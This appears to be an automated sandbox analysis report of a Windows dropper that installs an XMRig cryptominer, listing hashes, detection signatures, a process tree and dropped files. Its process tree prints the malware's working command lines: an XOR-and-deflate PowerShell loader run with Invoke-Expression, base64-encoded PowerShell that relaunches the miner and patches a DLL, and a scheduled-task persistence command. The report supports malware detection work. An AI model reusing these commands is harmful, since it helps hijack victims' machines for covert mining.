Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28-03-2024 18:11
Static task
static1
Behavioral task
behavioral1
Sample
176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe
Resource
win10v2004-20240226-en
General
-
Target
176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe
-
Size
2.8MB
-
MD5
50bf71ce7279b0449553b4be536822c3
-
SHA1
ba427c9cac10521248b6265bf2cacb997a8f80b5
-
SHA256
176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba
-
SHA512
15b60c5f04af2ae0a99ab13b98b3dbea92a6c7e1f35bc2010f97736e1226811cf4b74b19ab4055e61051ddbe3dda7a3f97019d6b062201145d02433b27645bbb
-
SSDEEP
49152:tMDRZ9IBVL+s0ezJGd80SHMsThF35Hj1Bzuzm4:tMDtIXLr06AdfEThF35PzuH
Malware Config
Signatures
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/files/0x0008000000023218-26.dat xmrig behavioral2/memory/4720-104-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/4720-1258-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/4720-1262-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/4720-1270-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/4720-1277-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/4720-1281-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/4720-1283-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/4720-1288-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/4720-1290-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig -
Blocklisted process makes network request 3 IoCs
flow pid Process 39 3724 powershell.exe 41 3724 powershell.exe 42 3724 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation 176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation maintenance.exe -
Executes dropped EXE 6 IoCs
pid Process 4392 176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe 2700 maintenance.exe 4720 idle_maintenance.exe 4704 wmntnnc 3636 wmntnnc 3764 maintenance.exe -
Loads dropped DLL 60 IoCs
pid Process 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0008000000023220-66.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2532 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5052 timeout.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 2700 maintenance.exe 2700 maintenance.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 3824 powershell.exe 2416 powershell.exe 2500 powershell.exe 3824 powershell.exe 3824 powershell.exe 2416 powershell.exe 2416 powershell.exe 2500 powershell.exe 2500 powershell.exe 3824 powershell.exe 3824 powershell.exe 3636 wmntnnc 3636 wmntnnc -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeLockMemoryPrivilege 4720 idle_maintenance.exe Token: SeLockMemoryPrivilege 4720 idle_maintenance.exe Token: SeDebugPrivilege 3724 powershell.exe Token: SeDebugPrivilege 3824 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeDebugPrivilege 2500 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3636 wmntnnc 3636 wmntnnc 3636 wmntnnc -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4392 176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe 3636 wmntnnc -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 380 wrote to memory of 2416 380 176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe 85 PID 380 wrote to memory of 2416 380 176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe 85 PID 380 wrote to memory of 2416 380 176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe 85 PID 380 wrote to memory of 928 380 176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe 88 PID 380 wrote to memory of 928 380 176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe 88 PID 380 wrote to memory of 928 380 176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe 88 PID 2416 wrote to memory of 3132 2416 cmd.exe 90 PID 2416 wrote to memory of 3132 2416 cmd.exe 90 PID 2416 wrote to memory of 3132 2416 cmd.exe 90 PID 928 wrote to memory of 2368 928 cmd.exe 91 PID 928 wrote to memory of 2368 928 cmd.exe 91 PID 928 wrote to memory of 2368 928 cmd.exe 91 PID 2416 wrote to memory of 2532 2416 cmd.exe 92 PID 2416 wrote to memory of 2532 2416 cmd.exe 92 PID 2416 wrote to memory of 2532 2416 cmd.exe 92 PID 928 wrote to memory of 4392 928 cmd.exe 93 PID 928 wrote to memory of 4392 928 cmd.exe 93 PID 928 wrote to memory of 4392 928 cmd.exe 93 PID 928 wrote to memory of 5052 928 cmd.exe 94 PID 928 wrote to memory of 5052 928 cmd.exe 94 PID 928 wrote to memory of 5052 928 cmd.exe 94 PID 2700 wrote to memory of 4720 2700 maintenance.exe 106 PID 2700 wrote to memory of 4720 2700 maintenance.exe 106 PID 2700 wrote to memory of 3724 2700 maintenance.exe 108 PID 2700 wrote to memory of 3724 2700 maintenance.exe 108 PID 2700 wrote to memory of 3724 2700 maintenance.exe 108 PID 3724 wrote to memory of 3824 3724 powershell.exe 110 PID 3724 wrote to memory of 3824 3724 powershell.exe 110 PID 3724 wrote to memory of 3824 3724 powershell.exe 110 PID 3724 wrote to memory of 4704 3724 powershell.exe 111 PID 3724 wrote to memory of 4704 3724 powershell.exe 111 PID 3724 wrote to memory of 4704 3724 powershell.exe 111 PID 3724 wrote to memory of 2416 3724 powershell.exe 112 PID 3724 wrote to memory of 2416 3724 powershell.exe 112 PID 3724 wrote to memory of 2416 3724 powershell.exe 112 PID 3724 wrote to memory of 2500 3724 powershell.exe 113 PID 3724 wrote to memory of 2500 3724 powershell.exe 113 PID 3724 wrote to memory of 2500 3724 powershell.exe 113 PID 4704 wrote to memory of 3636 4704 wmntnnc 114 PID 4704 wrote to memory of 3636 4704 wmntnnc 114 PID 4704 wrote to memory of 3636 4704 wmntnnc 114 PID 2500 wrote to memory of 3764 2500 powershell.exe 115 PID 2500 wrote to memory of 3764 2500 powershell.exe 115 PID 2500 wrote to memory of 3764 2500 powershell.exe 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe"C:\Users\Admin\AppData\Local\Temp\176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zbe2024328181138417.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\SysWOW64\schtasks.exeSchtasks.Exe /delete /tn "Maintenance" /f3⤵PID:3132
-
-
C:\Windows\SysWOW64\schtasks.exeSchtasks.Exe /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx2024328181138417.xml"3⤵
- Creates scheduled task(s)
PID:2532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zb2024328181138417.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\SysWOW64\chcp.comchcp 12513⤵PID:2368
-
-
C:\Users\Admin\AppData\Local\Temp\176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe"C:\Users\Admin\AppData\Local\Temp\176c01eadc93bcdd44484eed12be81470a5d6843e1316f9b9ad23ded0da544ba.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4392
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak3⤵
- Delays execution with timeout.exe
PID:5052
-
-
-
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exeC:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe .1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Users\Admin\AppData\Local\Temp\4c51484441505a4b485661586071762485185408825\idle_maintenance.exeC:\Users\Admin\AppData\Local\Temp\4c51484441505a4b485661586071762485185408825\idle_maintenance.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4720
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -c "if($host.version.major -lt 3){exit}$d =[IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Roaming\Maintenance\mod');$l=$d.Count;$m = New-Object Byte[] $l;[byte[]] $x=213,170,205,176,141,23,5,199;$j=0;for($i=0;$i -lt $l;$i++){$m[$i]=$d[$i] -bxor $x[$j];$j++;if($j -ge 8){$j=0}}$a = New-Object IO.MemoryStream(,$m);$b = New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream($a,[IO.Compression.CompressionMode]::Decompress));$c=$b.ReadToEnd();$b.Close();$a.Close();Invoke-Expression($c)"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand ZgB1AG4AYwB0AGkAbwBuACAAYwBoAGsAcAByAGMAKAAkAHAAKQB7AA0ACgAgACgAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAFAAcgBvAGMAZQBzAHMATgBhAG0AZQApAC4AUAByAG8AYwBlAHMAcwBOAGEAbQBlACAALQBjAG8AbgB0AGEAaQBuAHMAIAAiACQAcAAiACkADQAKAH0ADQAKAGkAZgAoAGMAaABrAHAAcgBjACgAJwBtAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwApACkAewANAAoAIABXAGEAaQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgACcAbQBhAGkAbgB0AGUAbgBhAG4AYwBlACcADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHcAbQBuAHQAbgBuAGMAJwApACkAewANAAoAIAAgAFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcAIAAtAEYAbwByAGMAZQANAAoAIAAgAFcAYQBpAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcADQAKACAAfQAgAA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwAtACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwApACkAewBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEYAbwByAGMAZQB9AA0ACgAgAGUAeABpAHQADQAKAH0A3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc".\wmntnnc"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc".\wmntnnc"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3636
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand JABwAGEAdABoAD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAnAA0ACgANAAoAJABiAGkAbgBmAG4APQAwAA0ACgBkAG8AIAB7AA0ACgAgACQAZgBpAGwAZQBzACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAEYAaQBsAHQAZQByACAAXwBNAEUASQAqAA0ACgAgAEYAbwByAEUAYQBjAGgAIAAoACQAZgBuACAAaQBuACAAJABmAGkAbABlAHMAKQAgAHsADQAKACAAIAAkAGIAaQBuAGYAbgA9ACQAcABhAHQAaAArACcAXAAnACsAJABmAG4ALgBuAGEAbQBlACsAJwBcAFEAdABHAHUAaQA0AC4AZABsAGwAJwANAAoAIAB9AA0ACgAgAGkAZgAoAC0AbgBvAHQAIAAkAGIAaQBuAGYAbgApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADEAMAAwAH0ADQAKAH0ADQAKAHcAaABpAGwAZQAoAC0AbgBvAHQAIAAkAGIAaQBuAGYAbgApAA0ACgANAAoAdwBoAGkAbABlACgALQBuAG8AdAAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBFAHgAaQBzAHQAcwAoACQAYgBpAG4AZgBuACkAKQB7AA0ACgAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAANAAoAfQANAAoADQAKACQAZgBzAD0AMAANAAoAZABvAHsADQAKACAAdAByAHkAewAkAGYAcwAgAD0AIABbAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBXAHIAaQB0AGUAKAAkAGIAaQBuAGYAbgApAH0ADQAKACAAYwBhAHQAYwBoAHsAJABmAHMAPQAwAH0ADQAKACAAaQBmACgALQBuAG8AdAAgACQAZgBzACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAAfQANAAoAfQANAAoAdwBoAGkAbABlACgALQBuAG8AdAAgACQAZgBzACkADQAKAA0ACgAkAGEAPQA1ADEANwA2ADEAOAA2AA0ACgAkAG4APQA0AA0ACgAkAGYAcwAuAFMAZQBlAGsAKAAkAGEALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAbgA7ACQAaQArACsAKQB7ACQAZgBzAC4AVwByAGkAdABlAEIAeQB0AGUAKAAwACkAfQANAAoAJABmAHMALgBDAGwAbwBzAGUAKAApACAADQAKAGUAeABpAHQA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand dwBoAGkAbABlACgALQBuAG8AdAAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBFAHgAaQBzAHQAcwAoACcALgBcAHMAaQBuAGcAbABlAHQAbwBuAC4AbABvAGMAawAnACkAKQB7AA0ACgAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAANAAoAfQANAAoAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAxADAAMAAwADsAJABpACsAKwApAA0ACgB7AA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwArACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAJABwAHIAdABjAC4AVwBhAGkAdABGAG8AcgBFAHgAaQB0ACgAKQANAAoAIAANAAoAIABpAGYAKAAkAHAAcgB0AGMALgBFAHgAaQB0AEMAbwBkAGUAIAAtAGUAcQAgADcANwA3ACkAewBiAHIAZQBhAGsAfQANAAoAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAADQAKACAAZQB4AGkAdAANAAoAfQA=3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe"C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe" +4⤵
- Executes dropped EXE
PID:3764
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5efeff23c1b6cd9aeb9cb508506955149
SHA18caf8e9e9932ad1f5de5b651e82e7770df51ef73
SHA256718652bf139d6068eb0617f41ae3a5c69df9847e4a2b69c28c114eabefc51f48
SHA51239bd2603a9fe13e993509a2f3f4f8068c4cee062644470a0399acc25d1dd4135e7aec8cbd5d59d9c97cf4230d57eccf9f7414afb468537d7b842d5ac7115f307
-
Filesize
3.5MB
MD5e2af153ed50cb5ef457972e656f1bc51
SHA1efe31f03ec2ce99ba4ff8d573734fc4259a28edf
SHA256043f0954abf32bf6d1669cf456a439accc7421af3ee7608e23c8e2b6e6a27c1c
SHA5122576c511868849ab258ef0bbe2fb3cbfe72eb02dc0ab5f4d7004d7a59ff5bfba035f54a2dc7ca55d569f51d2f4de654643fafa29905b32e1b1b498ff050c699e
-
Filesize
1KB
MD5664f2d313870b7a5221f64843b982ca6
SHA10aa6161f154f4c706b735ad94b98fc640eb22c8e
SHA256cb22d067d3131f5d5285ccf3d32132de5db9ae6d3e7ce07b423810ff608b1f0c
SHA5126a8faacbad176e435e37424ac84e0f5745cfd93165a0798c3eff8b2b16bc15d759e5cd95975783ed8f93f01a3d38dfedf6718ddcb6f17788297bee3933369894
-
Filesize
1.6MB
MD5b8fcffd511b6f1ad5c1bd56cecedd72b
SHA141a75f56566717bebb7fc0857a1ef5f8f3b5846e
SHA256a62a88f72c302e910b8d29ddb07fa635272dc71cd3ddfaef4d4b5332df87e08f
SHA512943069b98f8ec8d1835e888c484252ee3b229d9ab30a8a33892f6802164de2feb3827f80bed4e04a37a5251a6ae264fbe7ddcea87a877a6498eb0a42a91d63a8
-
Filesize
2.4MB
MD506393b89000d04d73d29c208bae4b624
SHA12039597ce0649ca6502ac8ed4277d4ae788388bd
SHA2560ccbc8d47c5677778b85d9625f2d2e9b49084572c984f60f6b6ce6f23a082c23
SHA512e717bbcea9572f33faf1448146ef454c5eb0e93286d7678d36023e694affad64fdd91622cb28b9610c02ab094249c8dd397b6283a89a9173b05358bb3af186d0
-
Filesize
993KB
MD524c2f70ff5c6eaddb995f2cbb4bc4890
SHA1c6534a6eb3e1e38fe36332d430eb33eeeb8ecc73
SHA2568dceafaaec28740385b1cb8cf2655db68ecf2e561053bfe494795019542491e4
SHA512d262c1b9162f7fcd121fc4c46ce5e85b5ad0e88cadc075ae6fe157ab407fc8558f9860b2cfcae9ae6119bb631c8b978652d1a93e4c2d093b6e7385e81719acf3
-
Filesize
27KB
MD54f7cfe168ff9fb400cac099cf3336145
SHA1a0e74ed858ff443d02678fc7949ce51b549b7f3b
SHA2564bcdeb300f5b733ef09bdbe3befba8dfc1126cc349d48fd0c845ce633adbd924
SHA5121b07b5b205abefae3ef70c1aaec9464e6ee11b059e45f796b3e7e6eb630f5c95f748e4a143d0c9d5209367b8f5fbb7aed28f659e625fef2fda0834c250a9dd22
-
Filesize
45KB
MD5a9cc2ff4f9cb6f6f297c598e9f541564
SHA1e38159f04683f0e1ed22baba0e7dcc5a9bc09172
SHA25636a7dd2596598916384044b680d62fc7369d246703a57178c27c74214a78585f
SHA5129d99f546e5fa8c235fef007d8eca990350f35d11cd903c5d91611c133166845834c27b1c6a9132c71776754580d9e62fb5072ce6ada1f48feecbf408ca39026f
-
Filesize
49KB
MD5cf6e48afbad2a930775723387080d2c3
SHA15172b9e02a6fae1f1f5cb3d4433dc9c4fcd2e234
SHA256b355041828e249b476d198f5b245b89a32e1a857f401f137e768e6e2f8b5f687
SHA5122cf137de885cf06222197fd2d47dc53190824b0ba5470562f2e96910770a76b0f3233d8e3184120bb692c411915f814471e77caf5b447405ed77568da9508653
-
Filesize
1.3MB
MD5d0e36d53cbcea2ac559fec2c596f5b06
SHA18abe0c059ef3403d067a49cf8abcb883c7f113ec
SHA256ae14e8d2ac9adbbb1c1d2a8001a017ba577663322fe7606c22bc0081d2764bc9
SHA5126cc4a3ede744f81a8e619ee919dfc25e3d16bdcdcf25ec49699d9c1b5511e29d88c67bb7f6936363960838a73e4417668fe6a18220bf777baf174bb8278b69be
-
Filesize
69KB
MD59897fb7cfe7f78b4e4521d8d437bea0e
SHA1f7cd930bac39701349ef3043986be42a705da3ad
SHA256d99399bd6ca916c0490af907fb06530839d0797b18a997ed5c091393fc2292f8
SHA512ad310e30a58fc42ce9d1b5265c4041ce59ee8acebc4ec5e3ce58af8415423a09387f303e5111938f51f0dff7a44714917ca860788136f4962baf1fbe8cac1088
-
Filesize
1.2MB
MD5ceef7d25903265391c926978cd340d79
SHA196fa3c93219a6c601f1edccba8e8f34f62261a7d
SHA256c35382b8c55c06660ed6025c732e978edcfc20f08d06f5042c45a55fa88ff6ae
SHA51252af013717761bc5389042172ab12c63f8539f200aaf52a15360c63896f1f035e403344b8d1bdbabdb0de569a9fbedc50a3a0bf2f6fd0cb0106693d3ba07208b
-
C:\Users\Admin\AppData\Local\Temp\_MEI47042\libopenblas.UWVN3XTD2LSS7SFIFK6TIQ5GONFDBJKU.gfortran-win32.dll
Filesize26.0MB
MD53948cdf77b74e661091994fed63f4e91
SHA1f78925d09d93e4a6a3b050647ba67fec139a420a
SHA256e9c64b69cf132be063b73a3e97c38702c0d57f7dde1369636e44da9ae930093c
SHA512b6f148faad61fd16a96b4c50e9c176a8143d3ca9d90a028f67d6f2bd862c708462529d6507e238f689747c8fd29cfd31afbab0c7b5021ccde33b4d262d07004c
-
Filesize
56KB
MD5cacae63b9c54ad318f8880c16671fa24
SHA142d23169a32f6cf14ab190684c119f0fb23ef211
SHA25627016f24a0038138b2ada13bbdbfb83dcfb6cd3b9a6cf8001ee7cff5fb55d2b2
SHA512802f3b1d8f81e3f8fa4cbe0004d93ff83bdffdbfbffc37d3dab92be28333bafce1ff3cca371fabb8bcbc0ec12a6f418d7f7c27dcb09364c21b436820703bf651
-
Filesize
70KB
MD5402bd5cd418eddaac5ebdfe3dfd47e91
SHA1a7b86d97bd51ecf4b6f3408449ade5684fef8014
SHA256e7a955f96285f592d1ed74e3ce10706f72bb903322893c08d67b29995baf1e52
SHA5121c82cba52b1ff686d608067692972d7fc807463f75f1eb01510cd032b68de6b26175d41072a494c83c36c88daf56fc58f8231fe9aed63d13bdaccf4844fcbcc5
-
Filesize
755KB
MD5bf38660a9125935658cfa3e53fdc7d65
SHA10b51fb415ec89848f339f8989d323bea722bfd70
SHA25660c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
SHA51225f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1
-
Filesize
1.2MB
MD5f21eb1e04f9983ba64714ee7acceb2cf
SHA1ea19650e3a5e055f50d2e03f9a8e51a15fb5fdf9
SHA256f42e10bbd242532d4a1f1dfd4d18ce031bdcdd02381188b9efe0517c6697a90b
SHA51208798e8663921a942c845774f42a66a41b6d983a05d39d1977f8417879742e81ca2b97dea0e2d84226c1f5f2447375490770700d655317187103e8e661a92c21
-
Filesize
141KB
MD56ab0907cb39324f03769092dd45caa80
SHA1aed7c8aab23ca52c57e6ec3f129665aaaffaf5a5
SHA256f5bdabbc4b7396d0836b0c7e6908a73a33650d503d7a89f2b8357f9e8f371171
SHA51270b2ad3c2651c2069511b9839e80fafb304de132bd1cd2dab4cc5cfc6735baf7df43640513e3cb71fb7a9f77008b860fc17647f5a4443ea4f50a578f3e3d4ced
-
Filesize
2.5MB
MD5fc4fd09975a71eada8f10229237ba2bc
SHA1d3ffc76d46efd9d96f50c8100e88aeb97ce81691
